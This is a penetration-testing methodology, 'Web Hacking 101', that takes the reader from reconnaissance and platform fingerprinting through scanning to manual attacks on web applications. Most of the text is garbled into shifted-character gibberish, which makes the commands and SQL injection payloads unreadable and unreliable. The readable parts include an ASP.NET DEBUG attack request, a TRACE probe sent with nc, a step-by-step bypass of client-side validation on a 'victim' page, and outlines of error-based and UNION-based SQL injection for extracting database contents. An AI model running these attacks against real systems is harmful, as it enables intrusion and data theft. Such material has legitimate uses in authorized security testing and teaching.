Web Hacking 101

Tactical Web Application
Penetration Testing Methodology

Phase 1: Open Source
Information Gathering
Phase 1a) OSSINT
6RDVDARHSDRRTBG@R
4DQUDQRMHEEMDS
/DSBQ@ESBNL
%NL@HMSNNKRBNL
$DMSQ@KNORMDS
$KDYMDS
3NASDWBNL
3DFDWHMENDWHEBFH
OXSGNMFDNDCFDOXVVVS@QFDSBNLO@MXBNL
5NNK-NB@SHNM
GSSOVVVDCFDRDBTQHSXBNLRNESFDNDCFDOX
Phase 1b) Search Engine Vulnerability Quick Hits
42*%QA (NNFKDENQ42-*MIDBSHNM
QTAXRPHCQALFPEHKDSXODIRO[EHKDSXOD@RO[EHKDSXOD@ROW[EHKDSXODOGO[
EHKDSXODOK[EHKDSXODBFH[EHKDSXODQA[EHKDSXODOX[EHKDSXODCNEHKDSXOD@ROW[
EHKDSXODOGO[EHKDSXODOK[EHKDSXODBFH[EHKDSXODQA[EHKDSXODOXHMTQKS@QFDSBNLO@MXBNL
RHSDS@QFDSBNLO@MXBNLRQ
GSSORPHCQTAXENQFDNQF
(NNFKDENQFDMDQHB%@S@A@RDDQQNQR
RHSDS@QFDSBNLO@MXBNL.HBQNRNES0-&%#1QNUHCDQENQ42-4DQUDQ
RHSDS@QFDSBNLO@MXBNL.HBQNRNES+&5%@S@A@RD&MFHMD
RHSDS@QFDSBNLO@MXBNL5XODLHRL@SBG
RHSDS@QFDSBNLO@MXBNL:NTG@UD@MDQQNQHMXNTQ42-RXMS@W
RHSDS@QFDSBNLO@MXBNL*MU@KHC42-RS@SDLDMSNQ+%#$
RHSDS@QFDSBNLO@MXBNL%NQHR%TJDDQQNQ
RHSDS@QFDSBNLO@MXBNL0KD%A&WBDOSHNM
RHSDS@QFDSBNLO@MXBNL+@RODQ&WBDOSHNM
RHSDS@QFDSBNLO@MXBNL'@S@K&QQNQ
RHSDS@QFDSBNLO@MXBNLRTOOKHDC@QFTLDMSHRMNS@U@KHC.X42-
RHSDS@QFDSBNLO@MXBNLLXRPK?
RHSDS@QFDSBNLO@MXBNL0%#$
RHSDS@QFDSBNLO@MXBNL+%#$
RHSDS@QFDSBNLO@MXBNL03"
RHSDS@QFDSBNLO@MXBNL"%0%#
9444B@MOX (NNFKDENQ944
OXSGNM944RB@MOXRGSSOVVVS@QFDSBNLO@MXBNL@944VQHSD
S@QFDSBNLO@MX?WWRSWSU
GSSOVVVO@BJDSRSNQLRDBTQHSXNQF6/*9RB@MMDQR944RB@MOXSWS
4D@QBGWRRDCBNLENQSGDS@QFDSBNLO@MX
(NNFKDENQFDMDQHB3'*R
RHSDS@QFDSBNLO@MXBNLOGOEHKD
RHSDS@QFDSBNLO@MXBNLOGOENKCDQ
RHSDS@QFDSBNLO@MXBNLOGOO@SG
RHSDS@QFDSBNLO@MXBNLOGORSXKD
RHSDS@QFDSBNLO@MXBNLOGOSDLOK@SD
RHSDS@QFDSBNLO@MXBNLOGO1)1?1"5)
RHSDS@QFDSBNLO@MXBNLOGOCNB
RHSDS@QFDSBNLO@MXBNLOGOCNBTLDMS
RHSDS@QFDSBNLO@MXBNLOGOCNBTLDMS?QNNS
RHSDS@QFDSBNLO@MXBNLOGOOF
RHSDS@QFDSBNLO@MXBNLOGOOCE
4B@MENQJMNVM3'*R
OXSGNMCNQJRB@MOXS@QFDSBNLO@MXBNLCNQJKHRSSWS
GSSOVVVKD@QMRDBTQHSXNMKHMDBNLQEH?SDRSSWS
GSSOVVVC@QJBCDBNLNSGDQRCNQJ4B@MOX
(NNFKD%HFFHSX#HMF%HFFHSX
GSSOVVVRS@BGKHTBNLHMCDWOGOQDRNTQBDRSNNKRFNNFKDG@BJHMFCHFFHSXOQNIDBS
-NNJENQEHKDRSG@SFHUDTOFNNCHMENQL@SHNM
QNANSRSWS
"M@KXYDQNANSRSWSTRHMF(NNFKD8DAL@RSDQ5NNKR
(NNFKDOQNUHCDR@M"M@KXYDQNANSRSWSETMBSHNM@RO@QSNEHSR(NNFKD
8DAL@RSDQ5NNKR VGHBGB@M@RRHRSVHSGSDRSHMF
@MCSGDOQNBDCTQDHR@RENKKNVR
4HFMHMSN(NNFKD8DAL@RSDQ5NNKRVHSGXNTQ(NNFKD"BBNTMS
0MSGD%@RGAN@QC BKHBJSGD63-ENQSGDRHSDXNTV@MS
$KHBJ5NNKR @MCSGDMBKHBJ"M@KXYDQNANSRSWS
VHSGLDS@ROKNHS
LRE@TWHKH@QX QNANSR?SWS
QTM
<>4B@MMDCNEGNRSR BNLOKDSD
<><>QNANSRSWSYQ
LRE@TWHKH@QX QNANSR?SWS
QTM
<><>QNANSRSWS@CLHMHRSQ@SNQ B@BGD BNLONMDMSR HL@FDR
HMBKTCDR HMRS@KK@SHNM K@MFT@FD KHAQ@QHDR LDCH@ LNCTKDR
OKTFHMR
SDLOK@SDR SLO WLKQOB
BQNRRCNL@HMWLK
OGOHMENOGO
4HSDL@OWLK
4DMCANTMBDDL@HKSN@MNMDWHRSDMS@CCQDRR@SS@QFDSBNLO@MXBNLRNXNTB@M
QD@CSGDGD@CDQHMENEQNLSGD.@HKDQ%@DLNM3DSTQMDC&L@HKQDRONMRD
:NTB@MTRT@KKXFDSSGD*1@CCQDRRNEL@HKRDQUDQSGHRV@X@MCFDS@MHCD@NESGD
HMSDQM@K*1Q@MFD
Phase 2: Platform Determination

1. Determine if the target is virtually hosted
RGQVGNHRRGGSSOVVVS@QFDSBNLO@MXBNL
GSSOO@BJDSRSNQLRDBTQHSXNQF6/*9RB@MMDQRQVGNHRRG
2. Determine if the target is load balanced

G@KADQCUGSSOVVVS@QFDSBNLO@MXBNL
GSSOG@KADQCRTODQ@CCHSHUDBNL
3. Determine if the target is protected by an IPS
NRRSLL@ECU1)551SGSSOVVVS@QFDSBNLO@MXBNLU
GSSOVVVOTQDG@BJHMFBNL@ECCNVMKN@CROGO
4. Determine if the target is protected by a WAF

V@EVEOXGSSOVVVS@QFDSBNLO@MXBNL
GSSOBNCDFNNFKDBNLOV@EEHS
5. Determine the target platform

@
0ODQ@SHMF4XRSDL 8HMCNVR-HMTW
ML@OR70VVVS@QFDSBNLO@MXBNL
A
8DA4DQUDQ5XOD **4"O@BGD
'HQDENW4DQUDQ4OX
GSSOR@CCNMRLNYHKK@NQFDM64EHQDENW@CCNM
GSSOQHMSGGSSOVVVUTKMDQ@AKDRHSDBNLRRHFM@STQDRSWS
GSSOMDSRPT@QDBNLGSSOQHMS
GL@O
GSSOTIDMHLTQJXQNBBNLGL@O
'HMFDQOQHMS3DEDQDMBD
GSSOOQNIDBSRVDA@OORDBNQF'HMFDQOQHMSHMF
B
%@S@A@RD5XOD .442-.X42-0Q@BKD
'HMFDQOQHMS3DEDQDMBD
GSSOOQNIDBSRVDA@OORDBNQF'HMFDQOQHMSHMF
B
4DQUDQ4HCD5DBGMNKNFX'HMFDQOQHMS "411)1+41
Extension
Technology Server Platform
.pl
Perl CGI script Generic; usually web servers running
on Unix
.cgi
Can be any scripting language
.py
Python
.rb
Ruby
.asp
Active Server Pages Microsoft IIS
.aspx
ASP+ Microsoft .NET
.asmx
ASP.NET WebServer
.php
PHP script Generic; usually interfaced with Apache
.cfm
ColdFusion Generic; usually interfaced with
Microsoft IIS
.cfml
ColdFusion Markup Language
.nsf
Lotus Domino Lotus Domino server
.jsp
Java Server Page Various platforms
.jnpl
Java WebStart File (formatted in XML)
.do
Java Struts Various platforms
.php3,php4,php5,phtml,inc
1)1&@RSDQ&FFR
GSSORGHEKDSSNQFAKNFEDAOGOD@RSDQDFFR
GSSOVVVOGOBNLOGO?D@RSDQ?DFFOGO
"41'HMFDQOQHMSHMF
GSSOLHBG@DKC@VNQFOQNIDBSR@RO@TCHSNQU
C
$KHDMS4HCD-@MFT@FD +@U@RBQHOS7#4BQHOS
7HDVVDARHSDRNTQBDBNCDSNCDSDQLHMDSGDRBQHOSHMFK@MFT@FDHMTRD
6. Determine if the site uses Application Pages or Functional Paths
DW@CLHMDCHS6RDQIROURO@Q@LDSDQO@RRHMF@RHM@CLHMIRO @BSHNMDCHS6RDQ
7. Look for server mis-configurations

* Microsoft ASP.NET Debugging Enabled
Filename: (startup.aspx)
https://<target>:443/path/startup.aspx
HTTP Attack Request:
DEBUG /path/startup.aspx HTTP/1.0
Referer: http://<ref_target>:80/
Connection: Close
Host: <target>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0)
Pragma: no-cache
Content-Length: 0
Command: stop-debug
Connection: closed
Cookie: ASPSESSIONIDAABQTDQT=CCEBGKPDCMIBMFILHDHCHJBF;
ASP.NET_SessionId=5midlh55bqdr00fcd5l2dp45
HTTP Vulnerable Response:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 09 Jul 2005 00:12:51 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
OK
* TRACE Method Enabled

HTTP Attack Request:
$ nc www.targetcompany.com 80
TRACE / HTTP/1.1
Host: www.targetcompany.com
HTTP Vulnerable Response:

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 31 Oct 2006 08:01:48 GMT
Connection: close
Content-Type: message/http
Content-Length: 39
TRACE / HTTP/1.1
Host: www.targetcompany.com
8. Make some manual requests for known valid and invalid resources, and
identify how the server handles it (ex. 200, 302, 404, etc)
Phase 3: Automatic Attack

Surface Mapping
1. Web Spidering and vulnerability identification with a local proxy
4OHCDQSGDVDARHSDVHSG@KNB@KOQNWXKHJD1@QNRNQ#TQO4THSD
2. Web Spidering and vulnerability identification with an active scanner
4B@MSGDVDARHSDVHSG@VDA@OOKHB@SHNMUTKMDQ@AHKHSXRB@MMDQRTBG@R
$NLLDQBH@K
"BTMDSHW
"OORB@M
8DA*MRODBS
/DSRO@QJDQ
0ODM4NTQBD
V@E
8@OHSH
/05& #DRTQDSNCNSGHRRSDOANSGVHSG@MCVHSGNTSKNFFHMFHMSNSGDRHSD
2a. Dealing with an Open-Source CMS

VG@SVDA
BLRDWOKNQDQ
QTAXVG@SVDA@GSSOVVVS@QFDSBNLO@MXBNL
5NNK-NB@SHNM
GSSOVVVLNQMHMFRS@QRDBTQHSXBNLQDRD@QBGVG@SVDA
ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@OKTFHMR
ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@
ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@SGDLDR
ODQKBLRDWOKNQDQOKTQKGSSOVVVS@QFDSBNLO@MXBNLSXODINNLK@NRUCA[FQDO
NRUCA
:NTB@MQDOK@BDINNLK@VHSG%QTO@K 8NQCOQDRR .@LAN5GHRSNNKB@MPTDQX047%#
ATS@M"1*JDXHRQDPTHQDC:NTB@MFDSSGD047%#"1*JDXEQNLGDQDGSSONRUCANQF
@OH@ANTS
5NNK-NB@SHNM
GSSOBLRDWOKNQDQFNNFKDBNCDBNLEHKDRBLRDWOKNQDQS@QAY
6R@FD3DEDQDMBD
GSSOBNCDFNNFKDBNLOBLRDWOKNQDQVHJH6R@FD
3. Discover Hidden Content

6RD@SNNKSG@SB@MKNNJENQGHCCDMBNMSDMSRTBG@R
8DAQSOK
ODQK8DAQSOKGGSSOVVVS@QFDSBNLO@MXBNL
GSSOO@BJDSRSNQLRDBTQHSXNQF6/*9BFHRB@MMDQR8DAQSOK
%HQ#TRSDQ
GSSORNTQBDENQFDMDSOQNIDBSRCHQATRSDQ
#TQO*MSQTCDQ
GSSOONQSRVHFFDQMDSRTHSDCNVMKN@CGSLK
Phase 4: Manual Attack Surface

Mapping
Phase 4a) Look for the big vulnerabilities
#QNVRDSGDDMSHQDRHSD DUDQXRHMFKDO@FD@RJHMFXNTQRDKESGQDD
PTDRSHNMR
1. Does this page or something on this page talk to a database, or another
system?
*ERNSDRSENQHMIDBSHNMUTKMDQ@AHKHSHDR 42- 91"5) -%"1 DSB

2. Can I or any other website user see what I type?
*ERNSDRSENQ944 NQRHLHK@Q@ATRDNESQTRSUTKMDQ@AHKHSHDR
3. Does this page or something on this page reference a local or remote file?
*ERNSDRSENQ-NB@K3DLNSD'HKDHMBKTCDR
4. Does his page appear to be passing user input to a System( ) function or
processing a block of code that is supplied from user input?
*ERN @SSDLOSBNLL@MCHMIDBSHNM
Phase 4b) Look for the less popular vulnerabilities

1. Inference from Published Content
3DUHDVSGDQDRTKSRNEXNTQTRDQCHQDBSDCAQNVRHMF@MCA@RHBAQTSDENQBD
DWDQBRHDR
*CDMSHEXM@LHMFBNMUDMSHNMRTRDC DW*EXNTRDDRNLDSGHMFKHJD
"CC%NBTLDMSIRO 7HDV%NBTLDMSIRO SGDMXNTRGNTKCKNNJENQSGHMFRKHJD
&CHSCNBTLDMSIRO @MC3DLNUD%NBTLDMSIRO
*CDMSHEXM@LHMFBNMUDMSHNMRENQRS@SHBBNMSDMS "MMT@K3DONQSOCE@MC
"MMT@K3DONQSOCE
LJCHQS@QFDSBNLO@MXCNBR
OXSGNMLDS@FNNEHKOXCVVVS@QFDSBNLO@MXBNLKE@KKN
S@QFDSBNLO@MXGSLKSS@QFDSBNLO@MXCNBR
GSSOVVVDCFDRDBTQHSXBNLLDS@FNNEHKOGO
3DUHDV@KKBKHDMSRHCDBNCDENQBKTDR DWGSLKBNLLDMSR I@U@RBQHOS
BNLLDMSRQDK@SDCSNOQNSDBSDCNQTMKHMJDCETMBSHNMR @MCGSLKCBENQLR
VHSGCHR@AKDC46#.*5DKDLDMSR
@ANTSGHCCDMRDQUDQRHCDBNMSDMS
4D@QBGENQSDLONQ@QXEHKDR DW%4?4SNQD EHKDOGO]
%NVMKN@C@MCCDBNLOHKDI@U@@OOKDSR RGNBJV@UDEHKDR @BSHUD9BNMSQNKR
%DBNLOHKDQR
I@CDDWD
+NCD@MC+4V@S
/DS3DEKDBSNQ
'K@RL
I@U@CDBNLOHKDQ
I@U@CDBNLOHKDQR
$CDBNLOHKDQ
48'AXSDBNCDCHR@RRDLAKDQ
4BQ@OD"QBGHUDNQF
GSSOVVVLDS@ROKNHSBNLLNCTKDR@TWHKH@QXRB@MMDQGSSODMTL?V@XA@BJ
2. Identify Client-Side Security Controls and attempt to bypass them

-NB@SD@KKHMRS@MBDRVGDQDGHCCDMENQLEHDKCR BNNJHDR @MC63O@Q@LDSDQR@QD@OO@QDMSKXADHMFTRDCSNSQ@MRLHSC@S@UH@SGDBKHDMS
"SSDLOSSNCDSDQLHMDNQFTDRRSGDOTQONRDSG@SSGDHSDLOK@XRHMSGD
@OOKHB@SHNMRKNFHB A@RDCNMSGDBNMSDWSHMVGHBGHS@OOD@QR@MCNM
BKTDRRTBG@RSGDO@Q@LDSDQRM@LD
6RHMF@KNB@KOQNWXLNCHEXSGDHSDLRU@KTDHMV@XRSG@S@QDQDKDU@MSSN
HSROTQONRDHMSGD@OOKHB@SHNM"RBDQS@HMVGDSGDQSGD@OOKHB@SHNM
ONRRDRRDR@QAHSQ@QXU@KTDRRTALHSSDCHMSGDO@Q@LDSDQ @MCVGDSGDQSGHR
DWONRDRSGD@OOKHB@SHNMSN@MXUTKMDQ@AHKHSHDR
%DS@HKR@ANTSCHR@AKHMF+@U@RBQHOSBKHDMSRHCDHMOTSU@KHC@SHNM
0UDQ@KK4SQ@SDFX %NVMKN@C@KNB@KBNOXNESGDO@FD@MCLNCHEXHSSNCHR@AKDBKHDMSRHCD
BNMSQNKR
*MXNTQAQNVRDQ QHFGSBKHBJNMSGDVDAO@FD 7HDV4NTQBD4@UD"R)@BJDCGSLK
/@UHF@SDSNSGD1045KHMD@MCLNCHEXSGDQDK@SHUDO@SGSN@M@ARNKTSDO@SG 5GHR
V@X SGDO@FDJMNVRVGDQDSNFNVGDMXNTONRSEQNLXNTQKNB@KG@BJDCGSLKEHKD
*ESGDVDARHSDHRB@KKDCUHBSHLBNL GDQDHRVG@SSGDHMOTSU@KHC@SHNMVNTKCKNNJKHJD
#&'03&
<form id="form_id" method="post" action="action.php"
onsubmit="javascript:return validate('form_id','email');">
<input type="text" id="email" name="email" />
<input type="submit" value="Submit" />
</form>
"'5&3
<form id="form_id" method="post" action="www.victim.com/action.php"
onsubmit="javascript:return validate('form_id','email');">
<input type="text" id="email" name="email" />
<input type="submit" value="Submit" />
</form>
3DEDQQHMFSNSGDDW@LOKDEQNL@ANUD RD@QBGENQSGDETMBSHNMB@KKDCU@KHC@SD *SVHKK
OQNA@AKXKNNJRHLHK@QSNSGHR
function validate(form_id,email) {
var reg = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Zaz]{2,4})$/;

var address = document.forms[form_id].elements[email].value;
if(reg.test(address) == false) {
alert('Invalid Email Address');
return false;
}
}
0MBDSGDU@KHC@SHNMETMBSHNMG@RADDMHCDMSHEHDC QDLNUD@KKU@KHC@SHNMBNMSDMSRNSG@S
SGDETMBSHNMNMKXQDSTQMRSQTD
function validate(form_id,email) {
QDSTQMSQTD
}
0ODMXNTQVDAAQNVRDQSNSGDKNB@KBNOXNEG@BJDCGSLK@MC@SSDLOS42-HMIDBSHNM
"SSGHRONHMS OKD@RDQDEDQSNSGD42-HMIDBSHNMS@BSHBRKNB@SDCHM1G@RD
3. Identify session handling mechanism and attempt to abuse it
4DRRHNM1QDCHBS@AHKHSX5DRSHMF
BTQK*RGSSOVVVS@QFDSBNLO@MXBNL
ODQKFDSBNNJHDOKGSSOVVVS@QFDSBNLO@MXBNL"41/&5?4DRRHNM*CSWS
ODQKNARDRRHNMOKSWS
GSSOVVVNODMK@ARNQFNARDRRHNMS@QFY
NQ
RSNLOXGSSOVVVS@QFDSBNLO@MXBNL
GSSOKB@LSTEBNQDCTLOBWRSNLOXSFY
NQ
8DA4B@Q@A
GSSOVVVNV@RONQFHMCDWOGO$@SDFNQX08"41?8DA4B@Q@A?1QNIDBS%NVMKN@C
%DBNCD7HDVRS@SD%@S@
$ ./viewstate --decode --verbose --url=GSSOVVVS@QFDSBNLO@MXBNL
GSSOK@ARONQSBTKKHRBNTJ@OOKHB@SHNMUHDVRS@SD
GSSORNTQBDENQFDMDSOQNIDBSRUHDVRS@SD
7HDVRS@SD3DEDQDMBD
GSSOLRCMLHBQNRNESBNLDMTRKHAQ@QXLR@ROW
4. Test SSL Ciphers

ODQKRRKBHOGDQBGDBJOKVVVS@QFDSBNLO@MXBNL
GSSOVVVTMRODBHEHBBNLRRK
NQ
GSSOVVVENTMCRSNMDBNLTRQDRNTQBDROQNCCDRBRRKCHFFDQGSL
NQ
ODQKL@MXRRKOK
GSSOVVVONQSBTKKHRRDBTQHSXBNLSNNKREQDDL@MXRRKS@QFY
GSSOK@ARONQSBTKKHRBNTJ@OOKHB@SHNM.@MX44-
NQ
ML@ORBQHOSRRKUMRDO VVVS@QFDSBNLO@MXBNL
GSSOML@ONQFMRDCNBRBQHOSRRRKUGSLK
NQ
# openssl s_client -no_tls1 -no_ssl3 -connect www.targetcompany.com:443
NQ
/DRRTR"BTMDSHWNQRHLHK@QUTKMDQ@AHKHSXRB@MMDQ
Phase 5: Manual Attacks

Manual SQL Injection (ASP/MS SQL Server)
*MSDFDQ@MC4SQHMF#@RDC*MIDBSHNM
*MSDFDQ*MIDBSHNM
GSSO<RHSD>O@FD@RO HCG@UHMF
$NKTLM<$0-6.//".&>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNSBNMS@HMDCHM@M
@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD
4SQHMF*MIDBSHNM
GSSO<RHSD>O@FD@RO HCWG@UHMF
$NKTLM<$0-6.//".&>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNSBNMS@HMDCHM@M
@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD
&MTLDQ@SHMF$NKTLM/@LDRVHSG)"7*/((3061#:$K@TRD
8GHKDVDQDNMSGDRTAIDBSNE)"7*/( HSHRONRRHAKDSNBNMSHMTDDMTLDQ@SHMF
BNKTLMM@LDREQNLSGDBTQQDMSS@AKDSG@SHRADHMFPTDQHDCTRHMFSGHRRXMS@W
GSSO<RHSD>O@FD@RO HCG@UHMF
$NKTLM<S@AKDM@LD?$0-6.//".&?>HRHMU@KHCHMSGDRDKDBSKHRSADB@TRDHSHRMNS
BNMS@HMDCHM@M@FFQDF@SDETMBSHNM@MCSGDQDHRMN(3061#:BK@TRD
GSSO<RHSD>O@FD@RO HC(3061#:S@AKDM@LD?$0-6.//".&?G@UHMF
GSSO<RHSD>O@FD@RO HC(3061#:S@AKDM@LD?$0-6.//".&? S@AKD
M@LD?$0-6.//".&?G@UHMF
&330342-*/+&$5*0/&953"$5%"5"#"4&64&3
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS 64&3

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<%#64&3>SN@BNKTLMNEC@S@SXODHMS
4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5TRDQ?M@LD

GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5KNFHM@LD'30.L@RSDQRXROQNBDRRDR
8)&3&ROHC!!41*%

GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5M@LD'30.L@RSDQRXRKNFHMR

&330342-*/+&$5*0/&953"$5%"5"#"4&/".&
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS %#?/".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<%#/".&>SN@BNKTLMNEC@S@SXODHMS
4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5CA?M@LD

GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5CA?M@LD
'30.L@RSDQRXROQNBDRRDR
8)&3&ROHC!!41*%

&330342-*/+&$5*0/&953"$5%"5"#"4&7&34*0/
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS !!7&34*0/

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<%#7&34*0/>SN@BNKTLMNEC@S@SXODHMS
4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5!!UDQRHNM

&330342-*/+&$5*0/&953"$54&37&3/".&
GSSO<RHSD>O@FD@RO HCNQBNMUDQS HMS !!4&37&3/".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<4&37&3/".&>SN@BNKTLMNEC@S@SXOD
HMS
4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5!!RDQUDQM@LD

/TLADQNEBNKTLMRDMTLDQ@SHNM
6RHMF0QCDQAXSNCDSDQLHMDSGDMTLADQNEBNKTLMRHM@FHUDMPTDQXRSQHMFENQTRDVHSG
AKHMCRPKHMIDBSHNM
GSSO<RHSDBNL>O@FD@RO NQCDQAX
8GDMVDO@RR HSRGNTKCR@XTMJMNVMBNKTLMHMNQCDQAXBK@TRD8DTRDSGD
OQNBDRRNEDKHLHM@SHNMSNCDSDQLHMDSGDMTLADQNEBNKTLMR/DWSVDVNTKCG@KUDSGD
MTLADQ
"F@HMVDVNTKCFDS@MDQQNQ-DSRSQXRNLDSGHMFKHJD
8GDMVDCNSGDMTLADQ SGDPTDQXBNLOKDSDRITRSEHMD8D@QDBKNRD ATSSGDQD
LHFGSADLNQD
"MNSGDQDQQNQHMSGDNQCDQAXBK@TRD8DJMNVSGDQDHRLNQDSG@M ATSKDRRSG@M
5GHRO@RRDCITRSEHMD.HFGSADLNQD KDSRSDRS
&QQNQ5GHRLD@MRVDG@UDBNKTLMR/NVVD@QDQD@CXENQRNLDAKHMC42-HMIDBSHNM
5GDQD@RNMENQCNHMFSGHRHRADB@TRDSGDTMHNMRDKDBSPTDQXLTRSG@UDSGDR@LDMTLADQ
NEBNKTLMRVGDMRDKDBSHMFEQNL@PTDQX/NVVDQTMSGDENKKNVHMFNMSGDRHSD@MCRS@QS
SDRSHMFENQRNLDS@AKDM@LDR
&330342-*/+&$5*0/-HRS %"5"#"4&4
GSSO<RHSD>O@FD@RO
GSSO<RHSD>O@FD@RO
GSSO<RHSD>O@FD@RO
GSSO<RHSD>O@FD@RO
HC
HC
HC
HC
NQHM 4&-&$5%#?/".&

NQHM 4&-&$5%#?/".&

NQHM 4&-&$5%#?/".&

NQHM 4&-&$5%#?/".&

GSSO<RHSD>O@FD@RO HC NQHM 4&-&$5%#?/".&

GSSO<RHSD>O@FD@RO HC NQHM 4&-&$5%#?/".& /

4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HCNQHM 4&-&$5M@LD'30.L@RSDQRXRC@S@A@RDR

&330342-*/+&$5*0/&953"$5RS %"5"#"4&5"#-&
GSSO<RHSD>O@FD@RO HCNQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD
WSXODBG@Q

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<5"#-&/".&>SN@BNKTLMNEC@S@SXOD
HMS
4NLDNSGDQNOSHNMR@QD
GSSO<RHSD>O@FD@RO HC NQBNMUDQS 4&-&$5M@LD'30.L@RSDQRXRNAIDBSR
8)&3&WSXOD6

&330342-*/+&$5*0/&953"$5MC%"5"#"4&5"#-&
GSSO<RHSD>O@FD@RO HCNQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD

WSXODBG@Q
@MC M@LD5"#-&/".&

HMS
4NLDNSGDQNOSHNMR@QD
8)&3&WSXOD6@MCM@LD5"#-&/".&

&330342-*/+&$5*0/&953"$5QC%"5"#"4&5"#-&
GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOM@LDEQNLRXRNAIDBSRVGDQD

WSXODBG@Q
@MC M@LD5"#-&/".&

HMS
4NLDNSGDQNOSHNMR@QD
8)&3&WSXOD6@MCM@LD5"#-&/".&

&330342-*/+&$5*0/&953"$5RS5"#-&$0-6.//".&
GSSO<RHSD>O@FD@RO HC NQHM RDKDBSSNOBNKTLM?M@LDEQNL
%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<$0-6.//".& >SN@BNKTLMNEC@S@
SXODHMS
&330342-*/+&$5*0/&953"$5MC5"#-&$0-6.//".&

%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&@MC
BNKTLM?M@LD$0-6.//".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<$0-6.//".&>SN@BNKTLMNEC@S@SXOD
HMS
&330342-*/+&$5*0/&953"$5QC5"#-&$0-6.//".&

%#/".&HMENQL@SHNM?RBGDL@BNKTLMRVGDQDS@AKD?M@LD5"#-&/".&@MC
BNKTLM?M@LD$0-6.//".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<$0-6.//".& >SN@BNKTLMNEC@S@
SXODHMS
&330342-*/+&$5*0/&953"$5RS'*&-%0'RS308
GSSO<RHSD>O@FD@RO HC NQBNMUDQS HMS RDKDBSSNO$0-6.//".&EQNL
5"#-&/".&

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&>SN@BNKTLMNEC@S@SXOD
HMS
&330342-*/+&$5*0/&953"$5MC'*&-%0'RS308
5"#-&/".&

HMS
&330342-*/+&$5*0/&953"$5MC'*&-%0'RS308

5"#-&/".&

HMS
&330342-*/+&$5*0/&953"$5RS'*&-%0'MC308

5"#-&/".&VGDQD$0-6.//".&/05HM '*&-%7"-6&
NQCDQAX$0-6./
/".&CDRB

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&0'/%308>SN@BNKTLM
NEC@S@SXODHMS
&330342-*/+&$5*0/&953"$5RS'*&-%0'MC308
5"#-&/".&VGDQD$0-6.//".&/05HM '*&-%7"-6&
NQCDQAX$0-6./
/".&CDRB

4XMS@WDQQNQBNMUDQSHMFSGDMU@QBG@QU@KTD<'*&-%7"-6&0'3%308>SN@BNKTLM
NEC@S@SXODHMS
.442-6/*0/*MIDBSHNM
6/*0/42-*/+&$5*0/%&5&$5*0/
*MSDFDQ*MIDBSHNM
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"--
"KKPTDQHDRHM@M42-RS@SDLDMSBNMS@HMHMF@6/*0/NODQ@SNQLTRSG@UD@MDPT@K
MTLADQNEDWOQDRRHNMRHMSGDHQS@QFDSKHRSR
/0&3303
6/*0/42-*/+&$5*0/$NKTLM5XOD&MTLDQ@SHNM
GSSO<RHSD>O@FD@RO HCTMHNMRDKDBSRTL BNKTLM?M@LD
EQNLS@AKD?M@LD
-NNJ@SDQQNQLDRR@FDSNCDSDQLHMDHEC@S@HRHMS NQU@QBG@Q

EQNLS@AKD?M@LD

EQNLS@AKD?M@LD
6/*0/42-*/+&$5*0/&953"$5%"5"#"4&64&3
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- 64&3

<%#64&3>
6/*0/42-*/+&$5*0/&953"$5%"5"#"4&/".&
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- %#?/".&
<%#/".&>
6/*0/42-*/+&$5*0/&953"$5%"5"#"4&7&34*0/
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- !!7&34*0/
<%#7&34*0/>
6/*0/42-*/+&$5*0/&953"$54&37&3/".&
GSSO<RHSD>O@FD@RO HC6/*0/4&-&$5"-- !!4&37&3/".&

<4&37&3/".&>
